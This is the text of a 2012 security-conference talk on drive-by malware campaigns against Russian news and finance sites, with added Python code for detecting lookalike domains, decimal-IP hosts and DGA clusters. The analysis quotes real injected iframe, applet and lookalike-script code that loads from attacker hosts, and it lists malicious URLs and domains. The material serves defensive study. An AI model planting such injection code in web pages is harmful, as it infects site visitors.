hacklu2012 v07
CyberCrime 2012 As we know it -
Trends, Monitoring,
Real Time Detection
@fygrave @vbkropotov
Presented at hack.lu 2012
3
agenda
● CyberCrime 2012: trends
● Malicious campaigns in 2012 (case studies)
● Evolving evasion techniques
● Automating detection in real time
● Conclusions
4
About speakers
● We are from Russia.. kind of ;)
5
Cybercrime 2012: trends
6
Emerging attack vectors
● DbD (drive-by download) – old, still popular
– High profile targets are getting compromised
● Email campaigns – getting bigger, mass mailings to users from compromised targets
● Social Engineering attacks
● Mobile plays an active role
7
Malicious Campaigns Sept 2011-Oct 2012
Case studies
8
Autumn 2011: kp.ru, a nationwide newspaper
● ~550 000 visitors per day
● Drive-By..
9
10
Autumn 2011: rzd.ru, the National Railroads
● ~200 000 visitors per day
● “Gimme a Malware!!”
11
Yep, rzd-rzd.ru as an intermediate
12
13
Just TWO domains, SURE?
Domain URL
interfax-rzd.in http://interfax-rzd.in/news/buble.php?key=rtgddfg%26u=root
rzd-interfax-online.in http://rzd-interfax-online.in/rzd-news/buble.php?key=rtgddfg%26u=root
news-rzdstyle.in http://news-rzdstyle.in/new-mail/buble.php?key=rtgddfg%26u=root
rzd-rzd.in http://rzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root
therzd-rzd.in http://therzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root
rzd-rzdcomp.in http://rzd-rzdcomp.in/rzd5/buble.php?key=rtgddfg%26u=root
rzd-rzdcomp.in http://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root
rzd-rzdcomp.in http://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root;1
press-rzd.in http://press-rzd.in/rzd/buble.php?key=rtgddfg%26u=root
rzd-press.in http://rzd-press.in/rzd/buble.php?key=rtgddfg%26u=root
rzd-banner.in http://rzd-banner.in/rzd/buble.php?key=rtgddfg%26u=root
pass-rzd.in http://pass-rzd.in/rzd/buble.php?key=rtgddfg%26u=root
rzd-ticket.in http://rzd-ticket.in/zd/buble.php?key=rtgddfg%26u=root
14
Campaign
15
Similar style detected domains
italia-new.in baner-klerk.ru bank-klerk.ru banner-klerk.ru blogs-klerk.ru buh-klerk.ru
daily-kp.ru eg-obzor.ru forum-klerk.ru i-obozrevatel.ru interfax-region.ru ipgeobase.in
job-klerk.ru klerk-bank.ru klerk-bankir.ru klerk-biz.ru klerk-boss.ru klerk-buh.ru
klerk-even.ru klerk-events.ru klerk-forum.ru klerk-law.ru klerk-new.ru klerk-news.ru
klerk-reklama.ru klerk-ru.ru klerk-work.ru klerk2.ru obozrevatel-ru.ru obozrevatelru.ru
kp-daily.ru kp-kp.in minsk-kp.in perm-kp.in wiki-klerk.ru
16
Klerk.ru
● Finance related portal
● ~150 000 visitors per day
17
“fileless” bot campaign 2011 – Oct 2012
● Version 1 (detected) Nov 2011
● Version 2 (detected) Feb-Mar 2012
● Version 3 (detected) May 2012
● Version 4 (detected) First seen in Aug 2012, last detected in Oct 2012 (distributed via infected banner networks too)
18
glavbukh.ru (Chief Accountant) ~45 000 targeted visitors per day
Date detected | IP | Domain | URL | Domain created | Referrer
09/Nov/2011 | 176.9.50.178 | jya56yhsvcsss.com | /BVRQ | 08/Nov/2011 | glavbukh.ru
11/Nov/2011 | 176.9.50.178 | ha526ugfsfh.com | /BVRQ | 11/Nov/2011 | glavbukh.ru
06/Feb/2012 | 66.199.232.98 | zcxrwuj4b.eu | /GLMF | 26/Jan/2012 | glavbukh.ru
13/Feb/2012 | 66.199.232.9 | zaurona.eu | /GLMF | 08/Feb/2012 | glavbukh.ru
20/Apr/2012 | 64.20.35.194 | vuyrtyal.info | /RK85 | 04/Apr/2012 | glavbukh.ru
03/May/2012 | 64.20.35.194 | hortezam.info | /RK85 | 24/Apr/2012 | glavbukh.ru
19
glavbukh.ru, tks.ru, etc. May 2012
:arg hl=us&source=hp&q=-1785331712&aq=f&aqi=&aql=&oq=
:field Adobe Flash Player 11 ActiveX|1.Conexant 20585 SmartAudio HD|3.ThinkPad Modem Adapter|7.Security Update for Windows XP (KB2079403)|1.Security Update for Windows XP (KB2115168)|1.Security Update for Windows XP (KB2229593)|1.Security Update for Windows
20
Drive-by newsru.com ver. Sept 2012
Domains on Sep 11 2012
21
Permanent fails, fileless bot campaign 2011 – Oct 2012
● Finance related portal
● ~130 000 visitors per day
<iframe src="http://riflepick.net/7GIC"><html lang="en" dir="ltr"><head><body class="normal" cosmic="force" onload="netti()" style="background: #fff; font-face: sans-serif"><div id="duquiddiv"></div><a class="motivator" name="top"></a><div style="display:block;width:1px;height:1px;overflow:hidden;">
<applet archive="/07GICjq" code="Applet.class">
Sep 17 2012 echo.msk.ru ~440 000 visitors per day
22
Permanent fails, fileless bot campaign 2011 – Oct 2012
<iframe src="http://riflepick.net/7GIC"><html lang="en" dir="ltr"><head><body class="normal" cosmic="force" onload="netti()" style="background: #fff; font-face: sans-serif"><div id="duquiddiv"></div><a class="motivator" name="top"></a><div style="display:block;width:1px;height:1px;overflow:hidden;"><applet archive="/07GICjq" code="Applet.class">
Sep 17 2012 Banner network adfox.ru affected
23
Campaign participants examples
Domain | Resource type | When seen | Unique hosts per day
Vesti.ru | TV news | Autumn 2012 | ~930 000
gazeta.ru | news | Winter 2012-Autumn 2012 | ~490 000
newsru.com | news | Spring 2012 - Autumn 2012 | ~470 000
echo.msk.ru | radio | Autumn 2012 | ~440 000
3DNews.ru | news | Summer 2012 – Autumn 2012 | ~180 000
inosmi.ru | news | Autumn 2011 – Summer 2012 | 115 000
glavbukh.ru | Accountants | Winter 2012-Spring 2012 | ~45 000
tks.ru | Finance (Import/Export) | Winter 2012-Autumn 2012 | ~23 000
24
Mobile scam
http://codbanners.ru
25
Mobile scams
● Fake apps are still big
● Android apps avail :)
26
27
• Legal • Faked
Another news, another phone…
28
29
Evolution of Counter-Detection and Evasion Techniques
31
Malware hosting locations: interesting examples
Countries, hosters and a slide with a VPN “#epicfail” in the configuration.
Samples in gov.ua and the Ogni Moskvy bank range
32
Drive By from Bank IP range
Date/Time 2011-11-25 15:45:27 MSK
Tag Name Java_Possibly_Malicious_Applet
server 1541897761 URL /dfbgeskdfa/Gmail.class
Packet DestinationAddress 10.X.X.X Packet DestinationPort 42642
Packet SourceAddress 91.231.126.33 Packet SourcePort 80
netnum: 91.231.126.0 - 91.231.126.255
netname: ognm
organisation: ORG-LCM2-RIPE
org-name: LTD CB "OGNI MOSKVY"
address: 27 st. New Basmannaya
address: 105066, Moscow,
address: Russia
e-mail: [email protected]
phone: +7 495 7805181
Gmail.class - Exploit:Java/CVE-2010-0840
33
Drive By from State Land Cadastral Center at the State Agency of Land Resources of Ukraine Range
Date/Time 2011-11-13 11:34:08 MSK
Tag Name Java_Possibly_Malicious_Applet
server 1539495587 URL /Gmail.class
Packet DestinationAddress 10.X.X.X Packet DestinationPort 40487
Packet SourceAddress 91.194.214.163 Packet SourcePort 80
netnum: 91.194.214.0 - 91.194.215.255
netname: SLCC
descr: State Land Cadastral Center at the State Agency of Land Resources of Ukraine
country: UA
organisation: ORG-SLCC1-RIPE
address: 3 Narodnogo Opolchenya street, Kiev, Ukraine
Gmail.class - Exploit:Java/CVE-2010-0840
34
Back end epic fail, Mar 13 2011: VPN 95.163.66.197, real IP 91.194.214.71
Exploit pack in the UA State Agency of Land Resources IP range still alive
35
Not typical (now typical :-) attacks: examples
- Attacks using stolen/misconfigured DNS accounts
- Attacks that require real-user interaction
- Intermediate hostnames similar to the compromised hostname (to make manual analysis troublesome?)
- Drive-by “FTP” types of attacks
36
Stolen domains example:
Time URL IP
24/Jan/2012:18:59:54 GET http://csrv2.fatdiary.org/main.php?page=7a5a09bea4d91836 146.185.242.69
24/Jan/2012:19:00:18 GET http://csrv2.fatdiary.org/content/field.swf HTTP/1.0 146.185.242.69
25/Jan/2012:09:36:31 GET http://csrv15.amurt.org.uk/main.php?page=7a5a09bea4d91836 146.185.242.69
25/Jan/2012:09:36:33 GET http://csrv15.amurt.org.uk/content/fdp2.php?f=17 146.185.242.69
25/Jan/2012:09:36:44 GET http://csrv15.amurt.org.uk/content/field.swf 146.185.242.69
25/Jan/2012:09:36:45 GET http://csrv15.amurt.org.uk/content/v1.jar 146.185.242.69
25/Jan/2012:09:36:48 GET http://csrv15.amurt.org.uk/w.php?f=17%26e=0 146.185.242.69
26/Jan/2012:07:28:05 GET http://csrv23.UIUIopenvrml.org/main.php?page=7a5a09bea4d91836 146.185.242.69
31/Jan/2012:10:27:35 GET http://csrv24.air-bagan.org/main.php?page=7a5a09bea4d91836 146.185.242.79
31/Jan/2012:10:27:47 GET http://csrv24.air-bagan.org/content/rino.jar 146.185.242.79
31/Jan/2012:18:18:51 GET http://csrv35.air-bagan.org/main.php?page=7a5a09bea4d91836 146.185.242.79
31/Jan/2012:18:19:03 GET http://csrv35.air-bagan.org/getJavaInfo.jar 146.185.242.79
04/Feb/2012:12:02:51 GET http://csrv29.prawda2.info/main.php?page=7a5a09bea4d91836 146.185.242.79
06/Feb/2012:09:08:51 GET http://csrv89.prawda2.info/main.php?page=7a5a09bea4d91836 146.185.242.79
37
WHAT'S COMMON
amurt.org.uk 46.227.202.68 Registered on: 15-Oct-1999
Name servers: ns1.afraid.org
air-bagan.org 122.155.190.31 Created On:05-Aug-2006
Name Server:NS1.AFRAID.ORG
fatdiary.org 71.237.151.22 Created On:17-Jul-2006
Name Server:NS1.AFRAID.ORG
prawda2.info 91.192.39.83 Created On:18-Oct-2007
Name Server:NS1.AFRAID.ORG
38
Malware domains reputation and DNS accounts attacks
Starting in August 2012 we have been detecting a second wave of this campaign; be careful. Examples from Sep 2012:
alex01.net -> 46.39.237.81 >>> games.alex01.net -> 178.162.132.178
socceradventure.net -> 72.8.150.14 >>> mobilki.socceradventure.net -> 178.162.132.178
talleresnahuel.com -> 74.54.202.162 >>> kino.talleresnahuel.com -> 178.162.132.178
qultivator.se -> 72.8.150.15 >>> 597821.qultivator.se -> 178.162.132.166
39
Carberp campaign Mar – May 2012 with tiny user interaction
function() { var url = 'http://yyzola.gpbbsdhmjm.shacknet.nu/g/'; … document.onmousemove = function() {
…
40
Hacked domains from the Spring Carberp campaign, hoster rel-net.eu 62.122.72.0 - 62.122.79.255
009.ru 1.poliklinika72.ru 1c-documents.ru 232info.ru alrf.ru ambulatorya.ru arkan.ru aryahome.ru aryatekstil.ru ato.ru auto-pik.ru bablam.ru badger.ru beauty-breeze.ru berkem.ru bestwatch.ru bounty72.ru bronipoezd.ru car-baby.ru chalet-cpark.ru crocus-hall.ru ct.spb.ru
ctc-tv.ru dailypixel.ru dataplex.ru doctor-istomin.ru draiverton.imho2.ru dtr.by dvvs.ru edimvkusno.ru eka4.ru expert-kld.ru family-fitness.ru fastrans.ru fflow.ru fictionbook.ru flowers-fantasy.ru gidrostyle.ru guitarism.ru hmcity.ru hotel-sokol.ru ipoteka-tmn.ru izvestia.ru
kb83.com knowingsnibiru.ru kolobok80.ru kontaktor.ru kuhni-mila.ru kyokushinkarate.ru laccent.ru lenovofans.ru lifenews.ru maleton.ru mandroid.ru manualbase.ru marianowka.ru marte.ru maxime-and-co.com medin.ru menyaraduet.ru mexa-n.ru molurist.ru mps-energo.ru new.turbinist.ru
oilloot.ru orthographia.ru ostrov72.ru pod-remont.ru region64.ru remont-krasnogorsk.ru revital.ru ribalkadaohota.ru rostteh.ru rstmos.ru russo-excursio.fr sakuraauto.ru sellex.ru shop-detect.ru skk-chess.ru skypecashin.ru spdnv.ru spk-up.ru sport.optika-8.ru stroyoffis.ru stud.samgtu.ru style.aladna.ru
subsidii.net topsalon.ru touravia.ru tushkan.net umade.ru vantatech.ru vash-master-remont.ru videoecology.ru vinils.ru vms56.ru volociki.ru vonny-and-dolan.ru vosesoftware.com winfield-oil.ru wusley.ru yarglobus.ru zip.ru zooeco.com турбинист.рф
41
Domains with interesting names
Intermediate domain names are often similar to the hacked domain name, or to a well known banner network or counter.
Spot the differences:
● google-analytics.com vs.
● google-analylics.com
● google-anatylics.com
42
Trud.ru affected Feb 21 2012
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analitycs.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
Name: google-analytics.com Addresses: 173.194.32.48
Name: www.google-analitycs.com Address: 184.82.149.180
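The two script blocks above differ only in one transposed pair of letters in the hostname, which is exactly the kind of difference a blocklist of exact strings never catches. The following is an added example, not code from the talk: it scores hostnames pulled from page text by edit distance against a small allow-list of the analytics and ad-network names the injected snippets imitate, and flags the near misses. The allow-list, the set of TLDs the extractor accepts and the sample HTML are constructed assumptions; the hostnames in it are the ones shown on the slides.

```python
"""Lookalike-hostname detection for the injected-script case on the Trud.ru
slide: google-analitycs.com, google-analylics.com and google-anatylics.com all
sit within two edits of google-analytics.com. Added example, not code from the
talk; TRUSTED, the TLD set in HOST_RE and SAMPLE_HTML are constructed."""
import re
from urllib.parse import unquote

# Hostnames the injected snippets on the slides imitate (assumed allow-list).
TRUSTED = ("google-analytics.com", "googlesyndication.com", "googleapis.com")

# Only these TLDs are extracted from page text (assumption; it also keeps the
# regex from picking up JavaScript property chains such as document.location).
HOST_RE = re.compile(r"\b([a-z0-9-]+(?:\.[a-z0-9-]+)*\.(?:com|net|org|ru|info|biz))\b")


def levenshtein(a: str, b: str) -> int:
    """Edit distance with insert/delete/substitute, O(len(a) * len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def registrable_part(host: str) -> str:
    """Keep the last two labels so www.google-analitycs.com compares as
    google-analitycs.com. Assumes two-label registrable domains, which holds
    for the .com/.ru/.net names on the slides but not for ccSLDs like .co.uk."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify(host: str, max_distance: int = 2):
    """Return (verdict, closest_trusted): 'trusted' for an exact registrable
    match, 'lookalike' within max_distance edits, otherwise 'unrelated'."""
    dom = registrable_part(host)
    best = min(TRUSTED, key=lambda t: levenshtein(dom, t))
    d = levenshtein(dom, best)
    if d == 0:
        return "trusted", best
    if d <= max_distance:
        return "lookalike", best
    return "unrelated", None


def scan_page(html: str):
    """Undo the %3C-style escaping the injected snippet relies on, extract
    every hostname and classify it, in document order."""
    text = unquote(html).lower()
    return [(h, classify(h)[0]) for h in HOST_RE.findall(text)]


# Constructed sample mirroring the two script blocks on the slide: the
# legitimate Google Analytics loader followed by the injected lookalike.
SAMPLE_HTML = """
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analitycs.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
"""

if __name__ == "__main__":
    for host, verdict in scan_page(SAMPLE_HTML):
        print(f"{verdict:10} {host}")
```

Run over crawled HTML, the "lookalike" verdicts are the rows worth a human look; the distance threshold of 2 covers every variant on the slides (one substitution, one transposed pair) while leaving genuinely different names such as rambler-analytics.ru as "unrelated".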
43
Noproblemslove.com, whoismistergreen.com, etc...
● Bot infection: Drive-By-HTTP
● Payload and intermediate malware domains: normal / DynDNS
● Distributed via: compromised web-sites
● C&C domains: normal
● C&C and malware domains located on different ASes. Sophisticated attack scheme. Timeout before activity.
● Typical bot activity: mass HTTP POST
44
Noproblemslove.com, whoismistergreen.com, etc...
45
Interesting domains from range 184.82.149.178-184.82.149.180 (Feb 2012)
Domain Name IP
www.google-analylics.com 184.82.149.179
google-anatylics.com 184.82.149.178
www.google-analitycs.com 184.82.149.180
webmaster-google.ru 184.82.149.178
paged2.googlesyndlcation.com 184.82.149.179
googlefilter.ru 184.82.149.179
rambler-analytics.ru 184.82.149.179
site-yandex.net 184.82.149.180
paged2.googlesyndlcation.com 184.82.149.179
www.yandex-analytics.ru 184.82.149.178
googles.4pu.com 184.82.149.178
googleapis.www1.biz 184.82.149.178
syn1-adriver.ru 184.82.149.178
46
C&C domains
whoismistergreen.com
IP address: 213.5.68.105
Create: 2011-07-26
Registrant Name: JOHN ABRAHAM
Address: ul. Dubois 119
City: Lodz
noproblemslove.com
213.5.68.105
Created: 2011-12-07
Registrant Contact:
Whois Privacy Protection Service
Whois Agent [email protected]
noproblemsbro.com
176.65.166.28
Created: 2011-12-07
Registrant Contact:
Whois Privacy Protection Service
Whois Agent [email protected]
patr1ckjane.com
IP Was 176.65.166.28
IP Now 213.5.68.105
Create: 2011-07-21
Registrant Name: patrick jane
Address: ul. Dubois 119
City: Lodz
47
Not typical attacks via FTP
First seen 24/10/2011 11:28 ftp://1572572686/Main.class
Sample Mar 07: Java version as a password
48
Domain | URL | Referrer | Payload | Size
3645455029 | /1/s.html | Infected site | html | 997
Java.com | /js/deployJava.js | 3645455029 | javascript | 4923
3645455029 | /1/exp.jar | | application/x-jar | 18046
3645455029 | /file1.dat | | application/executable | 138352
49
Attack analysis
- Script from www.java.com used during the attack
- Applet exp.jar loaded by FTP
- FTP server IP address obfuscated to avoid detection
50
Not Found?
51
Interesting modifications
GET http://java.com/ru/download/windows_ie.jsp?host=java.com%26returnPage=ftp://217.73.58.181/1/s.html%26locale=ru HTTP/1.1
Key feature example
Date/Time 2012-04-20 11:11:49 MSD
Tag Name FTP_Pass
Target IP Address 217.73.63.202
Target Object Name 21
:password Java1.6.0_30@:user anonymous
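The two features of the FTP drive-by on the preceding slides are a host written as a bare decimal number (3645455029 is 217.73.58.181) and an anonymous FTP login whose password carries the Java version string. As an added example, not code from the talk, the following normalizes dword-form hosts back to dotted quads so URLs can be matched against IP reputation data, and matches the FTP_Pass event pattern from the slide. The event lines are constructed from the values shown on the slides; the exact key/value layout of the events is an assumption.

```python
"""Two detection helpers for the FTP drive-by on the slides: decoding the
decimal ("dword") host form used in ftp://1572572686/Main.class, and matching
the anonymous-FTP password pattern "Java<version>@" shown in the FTP_Pass
event. Added example, not code from the talk; SAMPLE_EVENTS is constructed."""
import ipaddress
import re
from urllib.parse import urlsplit, urlunsplit


def decode_dword_host(host: str):
    """Return the dotted-quad form when host is a bare decimal IPv4 address
    (0 .. 2**32-1), else None. URL parsers accept this form, so a string
    blocklist of dotted IPs never sees it."""
    if host.isdigit() and int(host) < 2 ** 32:
        return str(ipaddress.IPv4Address(int(host)))
    return None


def normalize_url(url: str) -> str:
    """Rewrite a dword host to dotted form so the URL can be matched against
    IP-based reputation data; other URLs are returned unchanged."""
    parts = urlsplit(url)
    dotted = decode_dword_host(parts.hostname or "")
    if dotted is None:
        return url
    netloc = dotted if parts.port is None else f"{dotted}:{parts.port}"
    return urlunsplit((parts.scheme, netloc, parts.path, parts.query, parts.fragment))


# The slide's event shows ":password Java1.6.0_30@:user anonymous"; the
# version string between "Java" and "@" is captured.
JAVA_FTP_PASS_RE = re.compile(r":password\s+Java([\d._]+)@")
TARGET_IP_RE = re.compile(r"Target IP Address\s+(\d{1,3}(?:\.\d{1,3}){3})")


def flag_java_ftp_logins(events):
    """Return [(target_ip, java_version)] for FTP_Pass events that carry the
    Java password signature together with an anonymous login."""
    hits = []
    for line in events:
        pw = JAVA_FTP_PASS_RE.search(line)
        ip = TARGET_IP_RE.search(line)
        if pw and ip and ":user anonymous" in line:
            hits.append((ip.group(1), pw.group(1)))
    return hits


# Constructed sample: the slide's event plus a benign anonymous login.
SAMPLE_EVENTS = [
    "Date/Time 2012-04-20 11:11:49 MSD Tag Name FTP_Pass Target IP Address 217.73.63.202 "
    "Target Object Name 21 :password Java1.6.0_30@:user anonymous",
    "Date/Time 2012-04-20 11:12:03 MSD Tag Name FTP_Pass Target IP Address 192.0.2.10 "
    "Target Object Name 21 :password mozilla@example.com:user anonymous",
]

if __name__ == "__main__":
    for u in ("ftp://1572572686/Main.class", "ftp://3645455029/1/exp.jar"):
        print(u, "->", normalize_url(u))
    print(flag_java_ftp_logins(SAMPLE_EVENTS))
```

The decoder also recovers the "server" values of the earlier IDS events (1541897761 and 1539495587 are the two source addresses shown on the bank and cadastral-center slides), so the same normalization step applies to sensor output as well as URLs.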
52
Registrar abuse(1)
● gidzzkc.dogbookeoor-amtuzxo.org. A 91.220.84.7
● yqvdmbul.dogbookeoor-amtuzxo.org. A 91.220.84.7
● fncalzrmx.dogbookeoor-amtuzxo.org. A 91.220.84.7
● ghyyaweczb.dogbookeoor-amtuzxo.org. A 91.220.84.7
● vrmvneod.catxnahi-yarndfhh.info. A 91.220.84.6
● wrxpvxdudahlu.catxnahi-yarndfhh.info. A 91.220.84.6
● owcfudqqlgowwn.catxnahi-yarndfhh.info. A 91.220.84.6
● rskgwknaz.video-zgn-gqmbcax.info. A 91.220.84.6
● ahlcpdmssw.video-zgn-gqmbcax.info. A 91.220.84.6
● xrwxozkniqq.video-zgn-gqmbcax.info. A 91.220.84.6
● ighirfzcxdrii.video-zgn-gqmbcax.info. A 91.220.84.6
53
Registrar abuse (2)
● mlfskgdbwnfos.baseball-payed-mzigsy-voo.org 91.237.153.16
● onlkzxxlzbbgiy.payed-football-bciz-ydmslry.org 91.237.153.16
● Domains disappear without a trace within 30 minutes after use.
54
Registrar abuse (3)
● http://raisport.ru/contacts >>> xugamabpi.arraysort-qmppbkkn-abkn.org
● http://k62cg56m62.dyndns.info/js/vip.php?s=MSIE&n=8 >>> onlkzxxlzbbgiy.payed-football-bciz-ydmslry.org
● http://iked5gikr.ocry.com/do.php >>> fblcatagg.string-panelpvli-qbo-bmvf.org
55
Legit domains are used ..
11.09.2012
http://out1.sudameris.com.ar/out
qehboobwkqvo.task-games-pta-vywcngn.org
91.237.153.24
56
What could be more flux than fastflux? ;-)
● WHOIS fastflux … HOW?!
Domain ID: D166393631-LROR
Domain Name: FOOTBALL-SECURITY-WETRLSGPIEO.ORG
Created On: 21-Aug-2012 01:23:52 UTC
Last Updated On: 21-Aug-2012 01:23:53 UTC
Expiration Date: 21-Aug-2013 01:23:52 UTC
Sponsoring Registrar: Click Registrar, Inc. d/b/a publicdomainregistry.com (R1935-LROR)
Status: CLIENT TRANSFER PROHIBITED
Status: TRANSFER PROHIBITED
Status: ADDPERIOD
Registrant ID: PP-SP-001
Registrant Name: Domain Admin
Registrant Organization: PrivacyProtect.org
Registrant Street1: ID#10760, PO Box 16
Registrant Street2: Note - All Postal Mails Rejected, visit Privacyprotect.org
Registrant Street3:
Registrant City: Nobby Beach
Registrant State/Province:
Registrant Postal Code: QLD 4218
Registrant Country: AU
Registrant Phone: +45.36946676
57
Russian ASN (as5577)
58
Intermediate ev2.ru, SpyEye Campaign
59
Words distribution (len >3) in domain names
60
Incidents vs. time
CIRCL team informed
61
DEMO TIME: SHOW SOME VIDEOZ HERE :)
62
Advanced bots: Social network as C&C
63
Evasion techniques: summary
- Evasion of automated detection of compromised resource (via crawler)
- Evasion of automated detection of compromised resource (via sandbox)
- Evasion techniques used in exploit serving mechanisms and malicious payloads
- Counter-analysis techniques (in infrastructure)
64
Detection 2012
65
Detecting DGA through DNS traffic
Input: DNS packets (passive DNS)
Output: list of active domains
List of “could be active” domains
List of “were active” domains
IP addresses used by malicious infrastructure
66
DGA pattern: How it looks on the wire
67
Detecting DGA
● Simplified algorithm:
– take domains with failed DNS lookup (rcode: 2, non-existent domain or rcode: 3, domain name server failed)
– Group them by similarity function f(x)
– Find domains with even distribution.
– Identify other domains matching the same similarity criteria f(x)
– Discover relevant IP addresses
– Rinse and repeat :)
68
Detection: related works
From Throw-Away Traffic to Bots: Detecting the Rise of DGA-Based Malware (Manos Antonakakis, Roberto Perdisci et al.), 2012
L. Bilge, E. Kirda, C. Kruegel, and M. Balduzzi. EXPOSURE: Finding malicious domains using passive DNS analysis. In Proceedings of NDSS, 2011.
etc..
69
What we do differently:
● “lazy” WHOIS lookups, Team Cymru IP to ASN lookups
● Our own passive DNS index
● Sandbox farm (mainly to detect compromised websites automagically and study behavior)
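The IP-to-ASN enrichment mentioned in the first bullet is available as a DNS service: the reversed IPv4 address under origin.asn.cymru.com carries a TXT record of the form "ASN | prefix | CC | registry | allocated". As an added example, not code from the talk or from dnslyzer, the following builds that query name, parses the answer, and wraps the lookup in a lazy cache so an address is resolved at most once and only when a cluster actually needs it. The resolver function is pluggable; the offline run uses a constructed answer for the documentation prefix 192.0.2.0/24 and documentation ASN 64496 (the live path shells out to dig and needs network access).

```python
"""Team Cymru DNS-based IP-to-ASN lookup with lazy caching. Added example, not
code from the talk; CONSTRUCTED_ANSWERS holds a made-up answer in the real
record format so the example runs offline."""
import ipaddress
import subprocess


def origin_qname(ip: str) -> str:
    """Build the query name: octets reversed, e.g. 192.0.2.1 ->
    1.2.0.192.origin.asn.cymru.com."""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ".".join(reversed(octets)) + ".origin.asn.cymru.com"


def parse_origin_txt(txt: str) -> dict:
    """Parse one origin TXT answer. Multi-origin prefixes list several ASNs
    separated by spaces in the first field; the first one is kept."""
    fields = [f.strip() for f in txt.strip().strip('"').split("|")]
    if len(fields) != 5:
        raise ValueError(f"unexpected origin record: {txt!r}")
    asn, prefix, cc, registry, allocated = fields
    return {"asn": int(asn.split()[0]), "prefix": prefix, "cc": cc,
            "registry": registry, "allocated": allocated}


def dig_txt(qname: str) -> str:
    """Live resolver using the system dig(1); needs network access."""
    out = subprocess.run(["dig", "+short", qname, "TXT"],
                         capture_output=True, text=True, check=True).stdout
    lines = out.strip().splitlines()
    return lines[0] if lines else ""


class AsnLookup:
    """Lazy, memoized IP -> ASN enrichment. Each address is resolved at most
    once; 'queries' counts the lookups actually sent."""

    def __init__(self, resolve=dig_txt):
        self._resolve = resolve
        self._cache = {}
        self.queries = 0

    def __call__(self, ip: str) -> dict:
        key = str(ipaddress.IPv4Address(ip))
        if key not in self._cache:
            self.queries += 1
            self._cache[key] = parse_origin_txt(self._resolve(origin_qname(key)))
        return self._cache[key]


# Constructed answer for the RFC 5737 documentation prefix and the RFC 5398
# documentation ASN; a real answer has the same five-field shape.
CONSTRUCTED_ANSWERS = {
    "1.2.0.192.origin.asn.cymru.com": '"64496 | 192.0.2.0/24 | ZZ | ripencc | 2012-01-01"',
}

if __name__ == "__main__":
    offline = AsnLookup(resolve=lambda q: CONSTRUCTED_ANSWERS[q])
    print(offline("192.0.2.1"))
    offline("192.0.2.1")          # served from cache
    print("queries sent:", offline.queries)
```

Swapping the resolver for `dig_txt` (the default) gives live answers; keeping the cache in front of it is what makes the lookup "lazy" in the sense of the slide, since a passive-DNS feed repeats the same few addresses thousands of times a day.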
70
Architecture
71
Sample analysis (step by step)
● Start looking for a failed pattern and cluster id:
72
Sample analysis (two)
● Get the cluster ID: (eu_11_14)
Clustering is based on domain similarity. Currently used characteristics:
- f(zone, pattern (length, depth))
- additional characteristics (building up): natural language domain vs. generated string (occurrence of two-character sequences – n-grams)
- domain registration parameters (obtained via WHOIS [problematic!])
- cross-reference with existing malicious IP and AS reputation database (incrementally built by us)
73
Sample analysis
● Get other members of the cluster
74
Sample analysis
● Find common members (notice avatarmaker.eu could be a false positive, easily filtered out through common denominator filtering (IP, WHOIS information))
75
Sample analysis
● So we have C&C IP 66.175.210.173
● We can continue mining to see if we get any other domain names:
76
IP → domain transform
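The simplified algorithm, the clustering characteristics and the IP → domain transform from the preceding slides fit together as one pipeline over passive-DNS records. The following is an added example, not the authors' dnslyzer code: it keeps failed lookups, groups them by an assumed similarity key built from zone, depth and a coarse length bucket, drops labels that read like natural language using a bigram score (the n-gram characteristic), keeps clusters whose queries arrive at an even rate, collects the members that did resolve, and pivots from their IPs back to other names. RCODE values use the RFC 1035 numbering (NXDOMAIN = 3, SERVFAIL = 2). The similarity key, the bigram list, the thresholds and the sample records are constructed; the generated names under dogbookeoor-amtuzxo.org and the 91.220.84.7 address are the ones from the registrar-abuse slide, and avatarmaker.eu appears as the false positive noted above.

```python
"""Passive-DNS clustering along the lines of the talk's simplified DGA
algorithm. Added example, not the authors' dnslyzer code; cluster_key,
COMMON_BIGRAMS, the thresholds and SAMPLE are constructed assumptions."""
from collections import defaultdict, namedtuple
from statistics import mean, pstdev

NXDOMAIN, SERVFAIL = 3, 2   # RFC 1035 RCODE values

# Frequent English bigrams (assumed list; a deployment would derive it from
# benign labels in its own passive-DNS index).
COMMON_BIGRAMS = set("""
th he in er an re on at en nd ti es or te of ed is it al ar st to nt ng se ha
as ou io le ve co me de hi ri ro ic ne ea ra ce li ch ll be ma si om ur ca el
ta la ns di fo ho pe ec pr no ct us ac ot il tr ly nc et ut ss so rs un lo wa
ge ie wh ee wi em ad ol rt po we na ul ni ts mo ow pa im mi ai sh ir su id os
iv ia am fi ci vi pl ig tu ev ld ry mp fe bl ab gh ty op wo sa ay ex ke fr oo
av ag if ap gr od bo sp rd do uc bu ei ov by rm ep tt oc fa ef cu rn sc gi da
yo cr cl du ga qu ue ff ba ey ls va um pp ua up lu go ht ru ug
""".split())

Record = namedtuple("Record", "ts qname rcode answer")  # answer: IP or None


def cluster_key(qname: str):
    """Assumed similarity function f(zone, pattern(length, depth)): TLD,
    label count and a coarse bucket of the total name length."""
    labels = qname.lower().rstrip(".").split(".")
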